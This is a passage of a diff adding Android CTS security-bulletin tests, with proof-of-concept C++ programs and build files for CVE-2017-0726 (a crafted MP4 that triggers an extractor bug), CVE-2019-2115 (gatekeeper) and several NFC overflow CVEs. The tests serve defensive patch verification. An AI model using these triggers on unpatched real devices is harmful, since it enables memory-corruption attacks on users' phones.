+        omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, newInputBuffers[i].mID);
+    }
+    for (i = 0; i < opBufferCount; i++) {
+        omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, newOutputBuffers[i].mID);
+    }
+    /* Free OMX resources                                                */
+    omxUtilsFreeNode();
+
+    return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp
new file mode 100644
index 00000000000..32959f2090b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2017-0726",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils_track",
+    ],
+    include_dirs: [
+        "frameworks/av/media/libmedia/include",
+    ],
+    shared_libs: [
+        "libdatasource",
+        "libstagefright",
+        "libstagefright_foundation",
+        "libutils",
+        "liblog",
+    ],
+    cflags: [
+        "-DCHECK_MEMORY_LEAK",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp
new file mode 100644
index 00000000000..ea6935f7523
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp
@@ -0,0 +1,143 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "stdlib.h"
+
+#include "../includes/memutils_track.h"
+#include <android/IMediaExtractor.h>
+#include <datasource/DataSourceFactory.h>
+#include <dlfcn.h>
+#include <media/DataSource.h>
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/DataSourceBase.h>
+#include <media/stagefright/MediaExtractor.h>
+#include <media/stagefright/MetaData.h>
+
+unsigned char mp4_data[] = {
+    0x00, 0x00, 0x00, 0x1C, 0x66, 0x74, 0x79, 0x70, 0x6D, 0x70, 0x34, 0x32,
+    0x00, 0x00, 0x00, 0x00, 0x6D, 0x70, 0x34, 0x32, 0x64, 0x62, 0x79, 0x31,
+    0x69, 0x73, 0x6F, 0x6D, 0x00, 0x00, 0x00, 0x74, 0x6D, 0x6F, 0x6F, 0x76,
+    0x00, 0x00, 0x00, 0x6C, 0x75, 0x64, 0x74, 0x61, 0x00, 0x00, 0x00, 0x64,
+    0x6D, 0x65, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x58,
+    0x69, 0x6C, 0x73, 0x74, 0x00, 0x00, 0x00, 0x50, 0x2D, 0x2D, 0x2D, 0x2D,
+    0x00, 0x00, 0x00, 0x1C, 0x6D, 0x65, 0x61, 0x6E, 0x00, 0x00, 0x00, 0x00,
+    0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x69, 0x54,
+    0x75, 0x6E, 0x65, 0x73, 0x00, 0x00, 0x00, 0x14, 0x6E, 0x61, 0x6D, 0x65,
+    0x00, 0x00, 0x00, 0x00, 0x69, 0x54, 0x75, 0x6E, 0x53, 0x4D, 0x50, 0x42,
+    0x00, 0x08, 0x00, 0x18, 0x64, 0x61, 0x74, 0x61, 0x33, 0x32, 0x20, 0x34,
+    0x20, 0x33, 0x20, 0x32, 0x33, 0x32, 0x20, 0x34, 0x20, 0x33, 0x20, 0x32};
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmp4extractor.so"
+#define LIBNAME_APEX "/apex/com.android.media/lib/extractors/libmp4extractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmp4extractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib64/extractors/libmp4extractor.so"
+#endif
+
+#define TOTAL_SIZE 524432
+#define DATA_SIZE 144
+#define TRACK_SIZE (TOTAL_SIZE - DATA_SIZE + 16 + 1)
+#define TMP_FILE "/data/local/tmp/temp_cve_2017_0726"
+
+char enable_selective_overload = ENABLE_NONE;
+using namespace android;
+
+bool is_tracking_required(size_t size) { return (size == TRACK_SIZE); }
+
+int main() {
+  GetExtractorDef getDef = nullptr;
+  FILE *fp = fopen(TMP_FILE, "wb");
+  if (!fp) {
+    return EXIT_FAILURE;
+  }
+
+  char zero_array[TOTAL_SIZE - DATA_SIZE];
+  memset(zero_array, 0, (TOTAL_SIZE - DATA_SIZE) * sizeof(char));
+
+  /* Write mp4 stream */
+  fwrite(mp4_data, 1, DATA_SIZE, fp);
+
+  /* Append 0's to create custom PoC */
+  fwrite(zero_array, 1, (TOTAL_SIZE - DATA_SIZE), fp);
+  fclose(fp);
+
+  void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+  if (!libHandle) {
+    libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+    if (!libHandle) {
+      remove(TMP_FILE);
+      return EXIT_FAILURE;
+    }
+  }
+
+  getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+  if (!getDef) {
+    dlclose(libHandle);
+    remove(TMP_FILE);
+    return EXIT_FAILURE;
+  }
+
+  sp<DataSource> dataSource =
+      DataSourceFactory::getInstance()->CreateFromURI(NULL, TMP_FILE);
+  if (dataSource == nullptr) {
+    dlclose(libHandle);
+    remove(TMP_FILE);
+    return EXIT_FAILURE;
+  }
+
+  void *meta = nullptr;
+  void *creator = nullptr;
+  FreeMetaFunc freeMeta = nullptr;
+  float confidence;
+  if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+    creator = (void *)getDef().u.v2.sniff(dataSource->wrap(), &confidence,
+                                          &meta, &freeMeta);
+  } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+    creator = (void *)getDef().u.v3.sniff(dataSource->wrap(), &confidence,
+                                          &meta, &freeMeta);
+  }
+  if (!creator) {
+    dlclose(libHandle);
+    remove(TMP_FILE);
+    return EXIT_FAILURE;
+  }
+
+  CMediaExtractor *ret = ((CreatorFunc)creator)(dataSource->wrap(), meta);
+  if (ret == nullptr) {
+    dlclose(libHandle);
+    remove(TMP_FILE);
+    return EXIT_FAILURE;
+  }
+
+  if (meta != nullptr && freeMeta != nullptr) {
+    freeMeta(meta);
+  }
+
+  sp<MetaData> metaData = new MetaData();
+  MediaExtractorCUnwrapper *mediaExtractorCUnwrapper =
+      new MediaExtractorCUnwrapper(ret);
+  enable_selective_overload = ENABLE_MALLOC_CHECK;
+  mediaExtractorCUnwrapper->getTrackMetaData(*metaData.get(), 0, 1);
+  enable_selective_overload = ENABLE_NONE;
+
+  remove(TMP_FILE);
+  dlclose(libHandle);
+
+  return EXIT_SUCCESS;
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp
index f32aa90632c..4052106c755 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp
@@ -1,26 +1,30 @@
 /*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
+ * You may obtain a copy of the License at:
  *
- *      http://www.apache.org/licenses/LICENSE-2.0
+ * http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
+ *
  */
-package android.security.cts;
-
-import android.content.Context;
-
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
 
-    @Override
-    public boolean onCreate() {
-        return true;
-    }
+cc_test {
+    name: "CVE-2019-2115",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+    ],
+    include_dirs: [
+        "system/gatekeeper/include/gatekeeper/",
+    ],
+    shared_libs: [
+        "libgatekeeper",
+    ],
 }
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp
new file mode 100644
index 00000000000..9ddc0e16c3a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp
@@ -0,0 +1,106 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define private public
+
+#include "../includes/common.h"
+#include "gatekeeper.h"
+
+using namespace gatekeeper;
+
+bool isVulnerable = false;
+const uint8_t *authTokenKey = nullptr;
+
+void *operator new(decltype(sizeof(0)) n) noexcept(false) { return malloc(n); }
+
+void operator delete(void *ptr) throw() {
+    if (ptr == authTokenKey) {
+        isVulnerable = true;
+    }
+    if (!ptr) {
+        free(ptr);
+    }
+}
+
+class DerivedGateKeeper : public GateKeeper {
+   protected:
+    bool GetAuthTokenKey(const uint8_t **auth_token_key,
+                         uint32_t *length __attribute__((unused))) const {
+        *auth_token_key = (const uint8_t *)(new uint8_t());
+        authTokenKey = *auth_token_key;
+        return true;
+    }
+    void GetPasswordKey(const uint8_t **password_key __attribute__((unused)),
+                        uint32_t *length __attribute__((unused))) {}
+    void ComputePasswordSignature(uint8_t *signature __attribute__((unused)),
+                                  uint32_t signature_length __attribute__((unused)),
+                                  const uint8_t *key __attribute__((unused)),
+                                  uint32_t key_length __attribute__((unused)),
+                                  const uint8_t *password __attribute__((unused)),
+                                  uint32_t password_length __attribute__((unused)),
+                                  salt_t salt __attribute__((unused))) const {}
+    void GetRandom(void *random __attribute__((unused)),
+                   uint32_t requested_size __attribute__((unused))) const {}
+    void ComputeSignature(uint8_t *signature __attribute__((unused)),
+                          uint32_t signature_length __attribute__((unused)),
+                          const uint8_t *key __attribute__((unused)),
+                          uint32_t key_length __attribute__((unused)),
+                          const uint8_t *message __attribute__((unused)),
+                          const uint32_t length __attribute__((unused))) const {}
+    uint64_t GetMillisecondsSinceBoot() const { return EXIT_SUCCESS; }
+    bool GetFailureRecord(uint32_t uid __attribute__((unused)),
+                          secure_id_t user_id __attribute__((unused)),
+                          failure_record_t *record __attribute__((unused)),
+                          bool secure __attribute__((unused))) {
+        return false;
+    }
+    bool ClearFailureRecord(uint32_t uid __attribute__((unused)),
+                            secure_id_t user_id __attribute__((unused)),
+                            bool secure __attribute__((unused))) {
+        return false;
+    }
+    bool WriteFailureRecord(uint32_t uid __attribute__((unused)),
+                            failure_record_t *record __attribute__((unused)),
+                            bool secure __attribute__((unused))) {
+        return false;
+    }
+    uint32_t ComputeRetryTimeout(const failure_record_t *record __attribute__((unused))) {
+        return EXIT_SUCCESS;
+    }
+    virtual bool IsHardwareBacked() const { return false; }
+    bool DoVerify(const password_handle_t *expected_handle __attribute__((unused)),
+                  const SizedBuffer &password __attribute__((unused))) {
+        return false;
+    }
+};
+
+int main() {
+    uint8_t *auth_token = new uint8_t();
+    uint32_t length = sizeof(uint32_t);
+    SizedBuffer *sb = new SizedBuffer(auth_token, length);
+    uint64_t timestamp = 1;
+    secure_id_t user_id = 1;
+    secure_id_t authenticator_id = 1;
+    uint64_t challenge = 0;
+
+    DerivedGateKeeper *object = new DerivedGateKeeper();
+    object->MintAuthToken(sb, timestamp, user_id, authenticator_id, challenge);
+
+    delete auth_token;
+    delete object;
+    delete sb;
+    return (isVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp
new file mode 100644
index 00000000000..1166510586a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+    name: "CVE_2019_2135",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/nfa/include/",
+        "system/nfc/src/gki/common/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/ulinux/",
+        "packages/apps/Nfc/nci/jni/extns/pn54x/src/common/",
+        "packages/apps/Nfc/nci/jni/extns/pn54x/inc/",
+    ],
+    shared_libs: [
+        "libnfc_nci_jni",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp
new file mode 100644
index 00000000000..582ddb8c9d8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp
@@ -0,0 +1,40 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfa_api.h>
+#include <nfc_api.h>
+#include <phNfcTypes.h>
+#include <phNxpExtns.h>
+
+static void nfaMockDMCallback(uint8_t, tNFA_DM_CBACK_DATA *) {}
+static void nfaMockCCallback(uint8_t, tNFA_CONN_EVT_DATA *) {}
+
+int main(void) {
+  if (EXTNS_Init(nfaMockDMCallback, nfaMockCCallback) != NFCSTATUS_SUCCESS) {
+    return EXIT_FAILURE;
+  }
+  const int32_t size = 16;
+  const int32_t offset = size - 1;
+  uint8_t *p_data = static_cast<uint8_t *>(malloc(size));
+  if (p_data == nullptr) {
+    return EXIT_FAILURE;
+  }
+  p_data[offset] = 0x60;
+  EXTNS_MfcTransceive(&p_data[offset], 1);
+  free(p_data);
+  EXTNS_Close();
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp
new file mode 100644
index 00000000000..d6adf3ce8af
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2020-0037",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/common/",
+        "system/nfc/src/gki/ulinux/",
+        "system/nfc/src/nfa/include/",
+    ],
+    shared_libs: [
+        "libnfc-nci",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp
new file mode 100644
index 00000000000..766ee038b44
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+// borrowed from rw_i93.cc
+enum {
+  RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated            */
+  RW_I93_STATE_IDLE,          /* waiting for upper layer API          */
+  RW_I93_STATE_BUSY,          /* waiting for response from tag        */
+
+  RW_I93_STATE_DETECT_NDEF,   /* performing NDEF detection precedure  */
+  RW_I93_STATE_READ_NDEF,     /* performing read NDEF procedure       */
+  RW_I93_STATE_UPDATE_NDEF,   /* performing update NDEF procedure     */
+  RW_I93_STATE_FORMAT,        /* performing format procedure          */
+  RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure   */
+
+  RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag             */
+};
+
+// borrowed from rw_i93.cc
+enum {
+  RW_I93_SUBSTATE_WAIT_UID,          /* waiting for response of inventory    */
+  RW_I93_SUBSTATE_WAIT_SYS_INFO,     /* waiting for response of get sys info */
+  RW_I93_SUBSTATE_WAIT_CC,           /* waiting for reading CC               */
+  RW_I93_SUBSTATE_SEARCH_NDEF_TLV,   /* searching NDEF TLV                   */
+  RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked      */
+
+  RW_I93_SUBSTATE_RESET_LEN,  /* set length to 0 to update NDEF TLV   */
+  RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV      */
+  RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV             */
+
+  RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+  RW_I93_SUBSTATE_CHECK_READ_ONLY,   /* check if any block is locked         */
+  RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+                                      */
+
+  RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only             */
+  RW_I93_SUBSTATE_LOCK_NDEF_TLV,  /* lock blocks of NDEF TLV              */
+  RW_I93_SUBSTATE_WAIT_LOCK_CC    /* lock block of CC                     */
+};
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+  real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+  if (!real_GKI_getbuf) {
+    return;
+  }
+
+  real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+  if (!real_GKI_freebuf) {
+    return;
+  }
+
+  kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+  if (!kIsInitialized) {
+    init();
+  }
+  return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+  if (!kIsInitialized) {
+    init();
+  }
+  free(ptr);
+}
+
+int main() {
+  tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+  GKI_init();
+  rw_init();
+
+  uint8_t p_uid = 1;
+  if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+    return EXIT_FAILURE;
+  }
+
+  tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+  nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+  tNFC_CONN_EVT event = NFC_DATA_CEVT;
+  p_i93->state = RW_I93_STATE_SET_READ_ONLY;
+  p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
+  p_i93->block_size = 255;
+
+  enable_selective_overload = ENABLE_ALL;
+  tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+  if (!p_data) {
+    free(nfc_cb.quick_timer_queue.p_first);
+    return EXIT_FAILURE;
+  }
+
+  p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+  if (!(p_data->data.p_data)) {
+    free(p_data);
+    free(nfc_cb.quick_timer_queue.p_first);
+    return EXIT_FAILURE;
+  }
+  enable_selective_overload = ENABLE_NONE;
+
+  (p_data->data.p_data)->len = 10;
+  p_data->data.p_data->offset = 0;
+  p_data->status = NFC_STATUS_OK;
+
+  p_cb->p_cback(0, event, p_data);
+
+  free(p_data);
+  free(nfc_cb.quick_timer_queue.p_first);
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp
new file mode 100644
index 00000000000..195d430aec5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2020-0038",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/common/",
+        "system/nfc/src/gki/ulinux/",
+        "system/nfc/src/nfa/include/",
+    ],
+    shared_libs: [
+        "libnfc-nci",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp
new file mode 100644
index 00000000000..27acfe3d319
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+// borrowed from rw_i93.cc
+enum {
+  RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated            */
+  RW_I93_STATE_IDLE,          /* waiting for upper layer API          */
+  RW_I93_STATE_BUSY,          /* waiting for response from tag        */
+
+  RW_I93_STATE_DETECT_NDEF,   /* performing NDEF detection precedure  */
+  RW_I93_STATE_READ_NDEF,     /* performing read NDEF procedure       */
+  RW_I93_STATE_UPDATE_NDEF,   /* performing update NDEF procedure     */
+  RW_I93_STATE_FORMAT,        /* performing format procedure          */
+  RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure   */
+
+  RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag             */
+};
+
+// borrowed from rw_i93.cc
+enum {
+  RW_I93_SUBSTATE_WAIT_UID,          /* waiting for response of inventory    */
+  RW_I93_SUBSTATE_WAIT_SYS_INFO,     /* waiting for response of get sys info */
+  RW_I93_SUBSTATE_WAIT_CC,           /* waiting for reading CC               */
+  RW_I93_SUBSTATE_SEARCH_NDEF_TLV,   /* searching NDEF TLV                   */
+  RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked      */
+
+  RW_I93_SUBSTATE_RESET_LEN,  /* set length to 0 to update NDEF TLV   */
+  RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV      */
+  RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV             */
+
+  RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+  RW_I93_SUBSTATE_CHECK_READ_ONLY,   /* check if any block is locked         */
+  RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+                                      */
+
+  RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only             */
+  RW_I93_SUBSTATE_LOCK_NDEF_TLV,  /* lock blocks of NDEF TLV              */
+  RW_I93_SUBSTATE_WAIT_LOCK_CC    /* lock block of CC                     */
+};
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+  real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+  if (!real_GKI_getbuf) {
+    return;
+  }
+
+  real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+  if (!real_GKI_freebuf) {
+    return;
+  }
+
+  kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+  if (!kIsInitialized) {
+    init();
+  }
+  return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+  if (!kIsInitialized) {
+    init();
+  }
+  free(ptr);
+}
+
+int main() {
+  tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+  GKI_init();
+  rw_init();
+
+  uint8_t p_uid = 1;
+  if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+    return EXIT_FAILURE;
+  }
+
+  tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+  nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+  tNFC_CONN_EVT event = NFC_DATA_CEVT;
+  p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+  p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN;
+  p_i93->block_size = 30;
+
+  enable_selective_overload = ENABLE_ALL;
+  tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+  if (!p_data) {
+    free(nfc_cb.quick_timer_queue.p_first);
